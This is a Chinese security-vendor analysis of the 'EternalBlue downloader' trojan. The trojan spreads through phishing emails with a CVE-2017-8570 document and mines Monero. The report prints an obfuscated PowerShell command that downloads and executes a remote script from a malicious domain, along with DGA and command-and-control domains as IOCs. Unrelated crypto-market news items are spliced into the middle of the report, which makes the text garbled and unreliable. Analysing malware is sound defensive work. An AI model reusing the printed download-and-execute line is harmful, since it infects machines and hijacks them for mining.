“永恒之藍下載器木馬”新增釣魚郵件傳播，利用用戶機器挖礦門羅幣_MAI

來源：騰訊御見威脅情報中心

編者注：原標題為《“永恒之藍下載器木馬”新增釣魚郵件傳播，附件含CVE-2017-8570漏洞攻擊代碼》

“永恒之藍”下載器木馬在感染用戶機器上運行后，會自動當前用戶的郵箱通訊錄并發送附件為urgent.doc的文檔，該文檔附帶CVE-2017-8570漏洞攻擊代碼。

如果被攻擊用戶收到郵件并不慎打開文檔，就可能觸發漏洞執行Powershell命令下載mail.jsp：

美股三大指數集體高開 蘋果市值突破3萬億美元:金色財經報道，美股三大指數集體高開，道指漲0.50%，納指漲0.95%，標普500指數漲0.70%。蘋果漲逾1%，股價創歷史新高，市值突破3萬億美元。區塊鏈概念股走強，Marathon Digital漲逾4%，Riot Platforms、MicroStrategy漲超3%，嘉楠科技漲超2%。[2023/6/30 22:10:53]

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

Kraken：建議客戶考慮使用閃電網絡作為替代方案:金色財經報道，加密交易所Kraken的客戶支持經理在 Reddit 上稱，提高比特幣取款費用以匹配當前鏈上的交易費用，這有助于確保及時在鏈上處理取款，該經理還提到該公司公開的加密貨幣提款費用和最低提款金額清單并建議客戶考慮使用閃電網絡 (LN) 作為替代方案。[2023/5/11 14:57:46]

而下載使用的域名ap35nf7.jp實際上并沒有注冊，但是依然能夠解析到地址：t.awcna.com，是因為被感染機器的本地hosts文件被篡改，使得隨機生成的域名映射到木馬使用的惡意地址，細節請參考御見威脅情報中心此前發布的報告：《“永恒之藍下載器”木馬篡改hosts指向隨機域名，再用多個漏洞攻擊內網挖礦》。

外媒：英國財政大臣建議不要匆忙將加密市場納入監管范圍:5月21日消息，英國財政大臣Rishi Sunak在周五的一次講話中警告稱，在政府計劃將英國打造為加密貨幣中心之際，不要過快地將加密市場納入其機構的管轄范圍。Rishi Sunak今年4月曾透露，計劃監管穩定幣，并發布NFT，作為將英國定位為加密貨幣中心的努力的一部分。

盡管如此，FCA負責人Charles Randell表示，需要現實地對待監管“純粹投機性加密代幣”所需的準備，同時，尋求官方授權的加密公司需要進行必要的改進。

當一些加密行業人士敦促政府向監管機構施壓，要求其更加通融時，Randell繼續強調其機構獨立性的重要性。他還稱，不清楚FCA將為在其職責中增加數字資產付出多少成本。

報道稱，英國政府試圖與瑞士和迪拜等加密中心競爭，遭到加密行業許多人的質疑。（英國《金融時報》）[2022/5/22 3:33:18]

本次攻擊過程中，木馬將使用隨機生成的字符加“.cn”或”.jp“或”.kr“后綴作為DGA域名，并在hosts文件中指向域名：

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp經過高度混淆，多次解密后可以看到其安裝多個計劃任務下載Powershell腳本執行，并使用了新的計劃任務名：

“Bluetea“藍茶。

“永恒之藍”下載器木馬自出現之后從未停止更新，從最初的PE樣本攻擊到后來轉移為以Powershell無文件攻擊方式躲避查殺，并且通過安裝多個類型的計劃任務進行持久化。在傳播方式上，最初通過供應鏈攻擊積累一批感染機器后，又不斷利用”永恒之藍”漏洞，MSSql爆破，$IPC爆破，RDP爆破等方法進行擴散傳播，近期又增加了DGA域名攻擊和釣魚郵件攻擊，其最終目的只為利用用戶機器挖礦門羅幣獲利。

永恒之藍下載器木馬的歷次版本更新參考下表：

安全建議

1.建議用戶不要輕易打開不明來源的郵件附件，對于郵件附件中的文件要格外謹慎運行，如發現有腳本或其他可執行文件可先使用殺軟件進行掃描；

2.服務器使用安全的密碼策略，特別是IPC$、MSSQL、RDP賬號密碼，切勿使用弱口令，避免遭遇弱密碼爆破攻擊；

3.根據微軟安全公告及時修復Office漏洞CVE-2017-8570，需進行漏洞掃描和修復，或采用WindowsUpdate進行。

IOCs

http//t.awcna.com/mail.jsp

Tags：COMPOWMAIHELMintMe.com CoinWoonkly PowerMAID幣Helicopter Finance

芝麻開門交易所下載